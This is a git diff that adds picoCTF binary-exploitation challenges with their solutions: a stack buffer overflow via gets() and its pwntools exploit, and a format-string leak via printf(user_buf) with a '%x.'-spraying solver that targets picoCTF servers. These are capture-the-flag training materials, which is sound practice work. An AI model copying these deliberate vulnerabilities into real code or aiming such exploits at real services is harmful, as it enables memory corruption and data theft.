+"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
+
+int main(void)
+{
+  long code = 0;
+  char clutter[SIZE];
+
+  setbuf(stdout, NULL);
+  setbuf(stdin, NULL);
+  setbuf(stderr, NULL);
+
+  puts(HEADER);
+  puts("My room is so cluttered...");
+  puts("What do you see?");
+
+  gets(clutter);
+
+
+  if (code == GOAL) {
+    printf("code == 0x%llx: how did that happen??\n", GOAL);
+    puts("take a flag for your troubles");
+    system("cat flag.txt");
+  } else {
+    printf("code == 0x%llx\n", code);
+    printf("code != 0x%llx :(\n", GOAL);
+  }
+
+  return 0;
+}
diff --git a/pwn/clutter_overflow/flag.txt b/pwn/clutter_overflow/flag.txt
new file mode 100644
index 0000000..4944a4b
--- /dev/null
+++ b/pwn/clutter_overflow/flag.txt
@@ -0,0 +1 @@
+flag{FAKEFLAG}
diff --git a/pwn/clutter_overflow/solve.py b/pwn/clutter_overflow/solve.py
new file mode 100755
index 0000000..2a489b4
--- /dev/null
+++ b/pwn/clutter_overflow/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("chall")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process([exe.path])
+        if args.DEBUG:
+            gdb.attach(r)
+    else:
+        r = remote("mars.picoctf.net", 31890)
+
+    return r
+
+
+def main():
+    r = conn()
+    # gdb.attach(r, 'break *main+143')
+    print(r.recvuntil(b'What do you see?\n'))
+    r.sendline((b'A' * 264) + p64(0xdeadbeef))
+    print(r.recvall().decode())
+
+
+if __name__ == "__main__":
+    main()
diff --git a/pwn/cve_xxxx_xxxx/flag.txt b/pwn/cve_xxxx_xxxx/flag.txt
new file mode 100644
index 0000000..c8eaedd
--- /dev/null
+++ b/pwn/cve_xxxx_xxxx/flag.txt
@@ -0,0 +1 @@
+CVE-2021-34527
diff --git a/pwn/stonks/solve.py b/pwn/stonks/solve.py
new file mode 100755
index 0000000..b3312e5
--- /dev/null
+++ b/pwn/stonks/solve.py
@@ -0,0 +1,43 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.pwntools
+
+from pwn import *
+
+ADDR = "mercury.picoctf.net 59616"
+HOST, PORT = ADDR.split(" ")
+
+def main():
+    for x in range(1,2):
+        r = remote(HOST, PORT)
+        r.recvline()
+        r.recvline()
+        r.recvline()
+        r.recvline()
+        r.recvline()
+        r.sendline(b'1')
+        r.recvline()
+        r.recvline()
+        r.recvline()
+
+        # r.sendline(f'%{x}$s'.encode())
+        # print(f'%{x}$s'.encode())
+        r.sendline(b"%x." * 99 + b"%x")
+        r.recvline()
+        result = r.recvline()
+        print(result)
+        unpacked = []
+        for x in result.strip().split(b"."):
+            x = int(x, 16)
+            print(x)
+            unpacked.extend([
+                (x & 0x000000FF),
+                (x & 0x0000FF00) >> 8,
+                (x & 0x00FF0000) >> 16,
+                (x & 0xFF000000) >> 24,
+            ])
+        for x in unpacked:
+            if x >= ord('!') and x <= ord('~'):
+                print(chr(x), end='')
+
+if __name__ == "__main__":
+    main()
diff --git a/pwn/stonks/vuln.c b/pwn/stonks/vuln.c
new file mode 100644
index 0000000..5b385a2
--- /dev/null
+++ b/pwn/stonks/vuln.c
@@ -0,0 +1,148 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <time.h>
+
+#define FLAG_BUFFER 128
+#define MAX_SYM_LEN 4
+
+typedef struct Stonks {
+	int shares;
+	char symbol[MAX_SYM_LEN + 1];
+	struct Stonks *next;
+} Stonk;
+
+typedef struct Portfolios {
+	int money;
+	Stonk *head;
+} Portfolio;
+
+int view_portfolio(Portfolio *p) {
+	if (!p) {
+		return 1;
+	}
+	printf("\nPortfolio as of ");
+	fflush(stdout);
+	system("date"); // TODO: implement this in C
+	fflush(stdout);
+
+	printf("\n\n");
+	Stonk *head = p->head;
+	if (!head) {
+		printf("You don't own any stonks!\n");
+	}
+	while (head) {
+		printf("%d shares of %s\n", head->shares, head->symbol);
+		head = head->next;
+	}
+	return 0;
+}
+
+Stonk *pick_symbol_with_AI(int shares) {
+	if (shares < 1) {
+		return NULL;
+	}
+	Stonk *stonk = malloc(sizeof(Stonk));
+	stonk->shares = shares;
+
+	int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1;
+	for (int i = 0; i <= MAX_SYM_LEN; i++) {
+		if (i < AI_symbol_len) {
+			stonk->symbol[i] = 'A' + (rand() % 26);
+		} else {
+			stonk->symbol[i] = '\0';
+		}
+	}
+
+	stonk->next = NULL;
+
+	return stonk;
+}
+
+int buy_stonks(Portfolio *p) {
+	if (!p) {
+		return 1;
+	}
+	char api_buf[FLAG_BUFFER];
+	FILE *f = fopen("api","r");
+	if (!f) {
+		printf("Flag file not found. Contact an admin.\n");
+		exit(1);
+	}
+	fgets(api_buf, FLAG_BUFFER, f);
+
+	int money = p->money;
+	int shares = 0;
+	Stonk *temp = NULL;
+	printf("Using patented AI algorithms to buy stonks\n");
+	while (money > 0) {
+		shares = (rand() % money) + 1;
+		temp = pick_symbol_with_AI(shares);
+		temp->next = p->head;
+		p->head = temp;
+		money -= shares;
+	}
+	printf("Stonks chosen\n");
+
+	// TODO: Figure out how to read token from file, for now just ask
+
+	char *user_buf = malloc(300 + 1);
+	printf("What is your API token?\n");
+	scanf("%300s", user_buf);
+	printf("Buying stonks with token:\n");
+	printf(user_buf);
+
+	// TODO: Actually use key to interact with API
+
+	view_portfolio(p);
+
+	return 0;
+}
+
+Portfolio *initialize_portfolio() {
+	Portfolio *p = malloc(sizeof(Portfolio));
+	p->money = (rand() % 2018) + 1;
+	p->head = NULL;
+	return p;
+}
+
+void free_portfolio(Portfolio *p) {
+	Stonk *current = p->head;
+	Stonk *next = NULL;
+	while (current) {
+		next = current->next;
+		free(current);
+		current = next;
+	}
+	free(p);
+}
+
+int main(int argc, char *argv[])
+{
+	setbuf(stdout, NULL);
+	srand(time(NULL));
+	Portfolio *p = initialize_portfolio();
+	if (!p) {
+		printf("Memory failure\n");
+		exit(1);
+	}
+
+	int resp = 0;
+
+	printf("Welcome back to the trading app!\n\n");
+	printf("What would you like to do?\n");
+	printf("1) Buy some stonks!\n");
+	printf("2) View my portfolio\n");
+	scanf("%d", &resp);
+
+	if (resp == 1) {
+		buy_stonks(p);
+	} else if (resp == 2) {
+		view_portfolio(p);
+	}
+
+	free_portfolio(p);
+	printf("Goodbye!\n");
+
+	exit(0);
+}